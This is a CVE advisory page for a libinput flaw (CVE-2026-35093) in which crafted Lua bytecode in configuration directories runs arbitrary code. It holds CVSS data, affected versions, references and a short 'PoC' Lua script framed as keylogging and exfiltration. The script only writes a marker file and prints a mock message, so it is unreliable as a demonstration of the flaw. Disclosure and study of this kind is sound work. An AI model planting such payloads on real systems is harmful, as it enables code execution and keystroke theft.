Security Vulnerability Report
CVE-2026-35093 CVSS 8.8 HIGH

Published: 2026-04-01 14:16:57
Last Modified: 2026-04-07 20:31:20

Description

A flaw was found in libinput. A local attacker who can place a specially crafted Lua bytecode file in certain system or user configuration directories can bypass security restrictions. This allows the attacker to run unauthorized code with the same permissions as the program using libinput, such as a graphical compositor. This could lead to the attacker monitoring keyboard input and sending that information to an external location.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:freedesktop:libinput:*:*:*:*:*:*:*:* (versions before 1.30.3) - VULNERABLE
cpe:2.3:a:freedesktop:libinput:*:*:*:*:*:*:*:* (versions from 1.30.4 up to, but not including, 1.31.1) - VULNERABLE
cpe:2.3:o:fedoraproject:fedora:43:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fedoraproject:fedora:44:*:*:*:*:*:*:* - VULNERABLE
libinput (see the official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
lua
-- PoC Lua script to be compiled to bytecode
-- Attacker places this in libinput config directory (e.g., ~/.config/libinput/)
local io = require("io")
local os = require("os")

-- Function to simulate keylogging and data exfiltration
local function exploit_payload()
    -- Attempt to write a proof of execution file
    local file = io.open("/tmp/libinput_poc.txt", "w")
    if file then
        file:write("CVE-2026-35093 Exploit Executed: " .. os.date() .. "\n")
        -- USER may be unset; fall back so the concatenation cannot fail on nil
        file:write("Current User Privileges: " .. (os.getenv("USER") or "unknown") .. "\n")
        file:close()
    end
    -- Simulate sending data to external location (mock)
    -- In a real scenario, this would be a socket connection
    print("[!] Exfiltrating data...")
end

-- Execute the payload
exploit_payload()

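References

https://access.redhat.com/security/cve/CVE-2026-35093 (Third Party Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2453839 (Issue Tracking, Third Party Advisory)
https://gitlab.freedesktop.org/libinput/libinput/-/work_items/1271 (Broken Link)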

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35093", "sourceIdentifier": "[email protected]", "published": "2026-04-01T14:16:57.443", "lastModified": "2026-04-07T20:31:19.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libinput. A local attacker who can place a specially crafted Lua bytecode file in certain system or user configuration directories can bypass security restrictions. This allows the attacker to run unauthorized code with the same permissions as the program using libinput, such as a graphical compositor. This could lead to the attacker monitoring keyboard input and sending that information to an external location."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:freedesktop:libinput:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.30.3", "matchCriteriaId": "3829AD08-1AAF-42AA-8CA8-A9053797F35C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:freedesktop:libinput:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.30.4", "versionEndExcluding": "1.31.1", "matchCriteriaId": "A122E860-3D8E-4A07-9460-B636AA4BFC7A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fedoraproject:fedora:43:*:*:*:*:*:*:*", "matchCriteriaId": "E1D1BBE5-0886-4D95-9862-16A4C316F70A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fedoraproject:fedora:44:*:*:*:*:*:*:*", 
"matchCriteriaId": "DD1E6B15-C7BF-47E1-8034-501385D7B7DD"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-35093", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453839", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.freedesktop.org/libinput/libinput/-/work_items/1271", "source": "[email protected]", "tags": ["Broken Link"]}]}}